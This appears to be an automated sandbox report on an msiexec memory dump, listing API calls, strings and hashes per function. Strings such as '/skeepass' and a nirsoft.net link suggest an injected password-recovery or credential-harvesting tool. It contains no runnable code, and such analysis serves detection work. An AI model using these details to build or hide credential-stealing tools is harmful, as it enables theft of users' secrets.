                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1010922700-0
                                                                                        • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                        • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                        • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                        • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                        Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                        • malloc.MSVCRT ref: 004186B7
                                                                                        • free.MSVCRT ref: 004186C7
                                                                                        • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                        • free.MSVCRT ref: 004186E0
                                                                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                        • malloc.MSVCRT ref: 004186FE
                                                                                        • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                        • free.MSVCRT ref: 00418716
                                                                                        • free.MSVCRT ref: 0041872A
                                                                                        • free.MSVCRT ref: 00418749
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$FullNamePath$malloc$Version
                                                                                        • String ID: |A
                                                                                        • API String ID: 3356672799-1717621600
                                                                                        • Opcode ID: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                        • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                        • Opcode Fuzzy Hash: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                                                                                        • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                        Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                        • API String ID: 2081463915-1959339147
                                                                                        • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                        • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                        • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                        • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                        Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                        • API String ID: 2012295524-70141382
                                                                                        • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                        • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                        • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                        • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                        Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                        • API String ID: 667068680-3953557276
                                                                                        • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                        • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                        • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                        • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                        Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 004121FF
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                        • SelectObject.GDI32(?,?), ref: 00412251
                                                                                        • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                        • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                          • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                          • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                          • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                        • SetCursor.USER32(00000000), ref: 004122BC
                                                                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                        • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1700100422-0
                                                                                        • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                        • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                        • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                        • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                        Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                        • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                        • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                        • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                        • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                        • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                        • String ID:
                                                                                        • API String ID: 552707033-0
                                                                                        • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                        • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                        • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                        • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                        Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_snwprintf
                                                                                        • String ID: %%0.%df
                                                                                        • API String ID: 3473751417-763548558
                                                                                        • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                        • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                        • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                        • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                        Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                        • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                        • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                        • GetTickCount.KERNEL32 ref: 0040610B
                                                                                        • GetParent.USER32(?), ref: 00406136
                                                                                        • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                        • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                        • String ID: A
                                                                                        • API String ID: 2892645895-3554254475
                                                                                        • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                        • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                        • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                        • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                        Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                          • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                          • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                          • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                          • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                        • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                        • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                        • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                        • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                        • memset.MSVCRT ref: 0040DA23
                                                                                        • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                        • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                        • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                          • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                        • String ID: caption
                                                                                        • API String ID: 973020956-4135340389
                                                                                        • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                        • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                        • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                        • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                        Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                        • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                        • API String ID: 1283228442-2366825230
                                                                                        • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                        • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                        • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                        • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                        Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wcschr.MSVCRT ref: 00413972
                                                                                        • wcscpy.MSVCRT ref: 00413982
                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                        • wcscpy.MSVCRT ref: 004139D1
                                                                                        • wcscat.MSVCRT ref: 004139DC
                                                                                        • memset.MSVCRT ref: 004139B8
                                                                                          • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                          • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                        • memset.MSVCRT ref: 00413A00
                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                        • wcscat.MSVCRT ref: 00413A27
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                        • String ID: \systemroot
                                                                                        • API String ID: 4173585201-1821301763
                                                                                        • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                        • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                        • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                        • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                        Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcscpy
                                                                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                        • API String ID: 1284135714-318151290
                                                                                        • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                        • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                        • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                        • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                        Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                          • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                          • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                        • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                        • strchr.MSVCRT ref: 0040C140
                                                                                        • strchr.MSVCRT ref: 0040C151
                                                                                        • _strlwr.MSVCRT ref: 0040C15F
                                                                                        • memset.MSVCRT ref: 0040C17A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                        • String ID: 4$h
                                                                                        • API String ID: 4019544885-1856150674
                                                                                        • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                        • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                        • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                        • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                        Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                        • String ID: 0$6
                                                                                        • API String ID: 4066108131-3849865405
                                                                                        • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                        • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                        • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                        • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                        Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004082EF
                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                        • memset.MSVCRT ref: 00408362
                                                                                        • memset.MSVCRT ref: 00408377
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ByteCharMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 290601579-0
                                                                                        • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                        • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                        • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                        • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                        Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memchr.MSVCRT ref: 00444EBF
                                                                                        • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                        • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                        • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                        • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                        • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                        • memset.MSVCRT ref: 0044505E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memchrmemset
                                                                                        • String ID: PD$PD
                                                                                        • API String ID: 1581201632-2312785699
                                                                                        • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                        • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                        • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                        • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                        Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                        • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                        • GetDC.USER32(00000000), ref: 00409F6E
                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
